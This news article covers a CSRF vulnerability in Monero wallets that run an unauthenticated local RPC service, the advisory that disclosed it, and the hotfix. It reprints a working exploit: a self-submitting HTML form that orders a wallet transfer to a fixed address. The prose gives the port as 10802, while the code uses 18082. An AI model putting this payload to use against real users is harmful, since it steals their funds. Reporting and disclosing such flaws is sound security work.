Monero is slowly replacing Bitcoin as the preferred currency of the darknet. Thanks to the additional privacy and security features offered by its underlying CryptoNote protocol, it is much harder to track Monero transactions. However, a recent security alert has indicated that even though Monero transactions are safe and secure, the wallets aren’t. MWR Labs , a cybersecurity company had released an advisory earlier this month stating the presence of a Cross Site request Forgery vulnerability. The vulnerability could potentially allow attackers to remotely steal Monero cryptocurrency from the users who are using the compromised version of wallet. The list of vulnerable wallets included – Monero SimpleWallet, LightWallet, Wallet Chrome, GUI Client.net, Minonodo and other wallets for JS, NodeJS, and QT. All these vulnerable wallets were known to host an RPC web service on the local host, port 10802 which eliminated the need for user authentication to initiate payments. MWR Labs, in its advisory also posted the code snippet that can be used to exploit the vulnerability. <html> <form action=http://127.0.0.1:18082/json_rpc method=post enctype="text/plain" name="pay" > <input name='{"jsonrpc":"2.0","id":"0","method":"transfer","params":{"destinations":[{"amount":100000000000,"address":"49FuXtv95dkZj5aDaoWkbjQRv9Qu6UMwAAJKP68vksbpRJEPNZfkr6Ecbj9wrqG4xHAiMArmpGsxRbkmxAC8NEydBEvc162"}],"fee":000000000000,"mixin":3,"unlock_time":0,"payment_id":"","get_tx_key":true}}’ type=’hidden’> </form> <script> document.pay.submit() </script> </html> Since the issue was made public, the team behind Monero cryptocurrency have fixed the issue by releasing a hotfix . The hotfix, available on GitHub is currently available only for the platforms own wallet versions. It is not sure whether any of the third party wallet services were affected by the same vulnerability. Even if they were, whether the hotfix is applicable for their services is also another question that still has to be answered. Meanwhile, the Monero community should update their wallets to ensure its security. Those using third party wallet services, unsure about the security of their wallets should switch to native […]
